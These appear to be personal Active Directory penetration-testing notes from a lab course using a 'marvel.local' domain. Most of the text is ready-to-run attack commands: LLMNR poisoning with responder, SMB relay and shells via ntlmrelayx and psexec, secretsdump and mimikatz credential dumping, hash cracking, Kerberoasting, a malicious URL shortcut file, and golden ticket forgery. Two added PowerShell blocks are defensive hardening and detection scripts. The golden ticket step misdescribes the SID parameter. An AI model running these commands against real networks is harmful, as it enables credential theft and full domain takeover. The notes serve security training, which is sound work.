
AD Pentesting Notes

Basics
AD --> Directory service to manage Windows domain networks. Stores information related to objects, e.g. Computers, Users, Printers, etc.

Authentication --> using Kerberos

Physical components of Active Directory:

-> Domain Controller: Hosts a copy of the AD Directory Store; provides authentication and authorization; administrative access to manage user accounts & network resources
-> AD DS Data Store: Consists of NTDS.dit

Logical components of Active Directory:

-> AD Schema: Blueprint of what type of object can be stored within the AD
-> Domain: Used to group and manage objects in organizations
-> Tree: Group of domains (can have child domains)
-> Forest: Collection of trees
-> Organizational Units: Containers for users, groups, etc.
-> Trust: How we have access between resources
   Directional: Flows from trusting domain to trusted domain
   Transitive: Trust relationship is extended beyond a two-domain trust to include other trusted domains.
-> Objects: What is present inside an OU

Initial Attack Vector


LLMNR Poisoning Steps:

1. Victim tries to find where a specific device is, let's say a printer.
2. The server, let's say, doesn't know where it is, so it doesn't respond saying that it knows.
3. Victim sends a broadcast message in the network.
4. Attacker running responder responds: yes, I am the printer, send me your hash and I'll connect you.
5. Victim sends the hash.
6. Attacker cracks it and bingo! Inside the AD environment.
Steps to perform attack:

1. Run responder using the following command: responder -I eth0 -dw
2. Save the captured hash
3. Crack it using the following command: hashcat -m 5600 hash.txt wordlist_to_use.txt

Mitigation:

1. Disable LLMNR & NBT-NS
2. Use good, strong passwords

SMB Relay attack:

Instead of cracking the hash, we relay those hashes to specific machines and gain access

Requirements:

1. SMB Signing should be disabled
2. The account being relayed should be an admin on the machine we're authenticating to after relaying

Before running responder, set this configuration in responder's configuration file.

--> For checking hosts that have SMB Signing disabled:

nmap --script=smb2-security-mode.nse -p445 192.168.61.0/24

The IPs that have SMB signing enabled but not required are the ones we need.

Now run responder: responder -I eth0 -dw

Now run ntlmrelayx:

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support

In order to gain an interactive shell on the system, use the following command:

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -i

We can also use the following command, which executes whoami on the target:

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Gaining shell:

python3 /usr/share/doc/python3-impacket/examples/psexec.py marvel.local/fcastle:[email protected]

python3 /usr/share/doc/python3-impacket/examples/smbexec.py marvel.local/fcastle:[email protected]
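Defender-side counterpart to the LLMNR/NBT-NS mitigation listed under LLMNR poisoning and to the "SMB signing not required" condition this relay attack depends on, added here as an example and not part of the original notes: a PowerShell function that audits one Windows host for the three weak settings and, with -Enforce, fixes them. The function and parameter names are my own; the registry paths and the Smb* cmdlets are standard Windows ones. Run it from an elevated prompt.

```powershell
function Invoke-LegacyNameResolutionHardening {
    [CmdletBinding()]
    param([switch]$Enforce)   # report only by default; -Enforce applies the fixes

    $findings = @()

    # 1. LLMNR: EnableMulticast = 0 under the DNSClient policy key turns it off
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    if ($llmnr -ne 0) {
        $findings += 'LLMNR enabled (EnableMulticast is not 0)'
        if ($Enforce) {
            New-Item -Path $llmnrKey -Force | Out-Null
            Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord
        }
    }

    # 2. NBT-NS: NetbiosOptions = 2 on each interface disables NetBIOS over TCP/IP
    $ifaceRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    foreach ($iface in Get-ChildItem -Path $ifaceRoot) {
        $opt = (Get-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
        if ($opt -ne 2) {
            $findings += "NBT-NS enabled on interface $($iface.PSChildName)"
            if ($Enforce) { Set-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -Value 2 -Type DWord }
        }
    }

    # 3. SMB signing: "enabled but not required" is exactly what the relay needs,
    #    so require it on both the server and the client side
    if (-not (Get-SmbServerConfiguration).RequireSecuritySignature) {
        $findings += 'SMB server signing not required'
        if ($Enforce) { Set-SmbServerConfiguration -RequireSecuritySignature $true -Force }
    }
    if (-not (Get-SmbClientConfiguration).RequireSecuritySignature) {
        $findings += 'SMB client signing not required'
        if ($Enforce) { Set-SmbClientConfiguration -RequireSecuritySignature $true -Force }
    }

    if ($findings.Count -eq 0) { 'OK: LLMNR and NBT-NS disabled, SMB signing required' } else { $findings }
}

Invoke-LegacyNameResolutionHardening            # audit only
# Invoke-LegacyNameResolutionHardening -Enforce # apply; the NBT-NS change needs a reboot
```

In a domain the same three settings are normally pushed by GPO (the DNSClient policy key above is the one "Turn off multicast name resolution" writes); this script is for checking a single host or a lab box.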

IPv6 DNS Takeover

mitm6 -d marvel.local

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t ldaps://<DC's IP> -wh fakewpad.marvel.local -l lootme

Post Compromise Enumeration


1. PowerView

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1 -Outfile PowerView.ps1

For bypassing execution policy: powershell -ep bypass

. .\PowerView.ps1

Get-NetDomain --> gets info about the domain

Get-NetDomainController --> tells where the Domain Controller is and other info

Get-DomainPolicy --> gets the different policies of the domain

(Get-DomainPolicy)."system access" --> system access policy info

Get-NetUser --> gets info about all users

Get-NetUser | select cn --> displays only the common name

Get-NetUser | select samaccountname --> displays the SAM account name (used to log in, e.g. MARVEL\Administrator)

Get-NetUser | select description --> displays the description of accounts

Get-UserProperty --> displays the properties that users can have

Get-UserProperty -Properties pwdlastset --> last password set property of all accounts

Get-NetComputer --> gets all computers in the domain

Get-NetComputer | select OperatingSystem --> shows the OS running on the computers

Get-NetGroup --> lists all the groups

Get-DomainGroupMember "Domain Admins" --> gets all the users of the Domain Admins group

Invoke-ShareFinder --> finds all the shares on the network

Get-NetGPO --> lists the Group Policy Objects in the domain

2. BloodHound

apt install bloodhound

neo4j console

Do the rest of the setup.

bloodhound

In the Windows machine:

Invoke-WebRequest https://raw.githubusercontent.com/SpecterOps/BloodHound-Legacy/refs/heads/master/Collectors/SharpHound.ps1 -Outfile SharpHound.ps1

powershell -ep bypass

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip

Now copy the zip file to the system where you have BloodHound.

Post Compromise Attacks


1. Pass the Hash

Use the hash to log in to the system.

apt install crackmapexec

Pass the password using crackmapexec: crackmapexec smb 192.168.61.0/24 -u fcastle -d MARVEL.local -p Password1

Dump SAM file: crackmapexec smb 192.168.61.0/24 -u fcastle -d MARVEL.local -p Password1 --sam

Dump hashes using secretsdump:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py marvel.local/fcastle:[email protected]

hashcat -m 1000 hashes.txt wordlist.txt

crackmapexec smb <IP> -u username -p password --local-auth

2. Token Impersonation

Tokens: Temporary keys that allow you to access a system or network without providing creds

Delegate token: used for logging into a machine or using RDP

Impersonate token: domain logon script or network drive

Steps: run exploit/windows/smb/psexec in metasploit

After getting meterpreter, run the following commands:

load incognito

list_tokens -u

impersonate_token marvel\\administrator

3. Kerberoasting

python3 GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.61.129 -request

hashcat -m 13100 hashes.txt wordlist.txt
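A detection-side example for the Kerberoasting request above, added here and not part of the original notes: run on a Domain Controller (with "Audit Kerberos Service Ticket Operations" enabled so event 4769 is logged), it groups successful RC4 service-ticket requests by requesting account and client IP and reports requesters that pulled tickets for many different SPNs. The function name and the threshold value are my own assumptions; the event fields are the standard 4769 EventData names.

```powershell
function Find-KerberoastActivity {
    param(
        [int]$Hours = 24,
        [int]$Threshold = 5   # distinct RC4 service tickets per requester before alerting (assumed tuning value)
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    $rows = foreach ($e in $events) {
        # Pull the EventData fields out of the event XML into a hashtable
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # Drop the normal noise: failed requests, the krbtgt service itself and
        # machine accounts (ServiceName ending in $). Keep only RC4-HMAC (0x17),
        # which is what GetUserSPNs.py asks for so the hash is cheap to crack.
        if ($d.Status -ne '0x0') { continue }
        if ($d.ServiceName -eq 'krbtgt' -or $d.ServiceName -like '*$') { continue }
        if ($d.TicketEncryptionType -ne '0x17') { continue }

        [pscustomobject]@{
            Time      = $e.TimeCreated
            Requester = $d.TargetUserName
            ClientIP  = $d.IpAddress
            Service   = $d.ServiceName
        }
    }

    # One requester pulling RC4 tickets for many different SPNs is the signal
    $rows | Group-Object Requester, ClientIP | ForEach-Object {
        $services = $_.Group.Service | Sort-Object -Unique
        if (@($services).Count -ge $Threshold) {
            [pscustomobject]@{
                Requester = $_.Group[0].Requester
                ClientIP  = $_.Group[0].ClientIP
                Services  = $services -join ', '
                First     = ($_.Group.Time | Measure-Object -Minimum).Minimum
                Last      = ($_.Group.Time | Measure-Object -Maximum).Maximum
            }
        }
    }
}

Find-KerberoastActivity -Hours 24 -Threshold 5 | Format-Table -AutoSize
```

Service accounts that still only support RC4 will show up legitimately, so tune the threshold per environment; moving those accounts to AES (and long passwords) removes both the false positives and the cheap crack.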

4. GPP Attack

Group Policy Preferences attack --> GPP allowed admins to create policies using embedded credentials

5. URL File Attack (SCF Attack)

Requires a compromised user with a share, or an open share.

Save a file as:

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.61.128\%USERNAME%.icon
IconIndex=1

The rest is just running responder.

6. Mimikatz

Tool used to view and steal creds, generate Kerberos tickets and leverage attacks

privilege::debug --> allows debugging a process that we wouldn't otherwise have access to

sekurlsa::logonpasswords --> to find all logged-in passwords

lsadump::sam --> used to dump the SAM

lsadump::lsa /patch --> dump LSA

7. Golden ticket attack

Use the hash of the krbtgt account to generate a TGT

Use this TGT to access any resource on the system

Steps:

privilege::debug

lsadump::lsa /inject /name:krbtgt

From the output, use the following:

kerberos::golden /User:Administrator /domain:marvel.local /sid:<SID OF krbtgt> /krbtgt:<NTLM hash of krbtgt account> /id:500 /ptt

misc::cmd
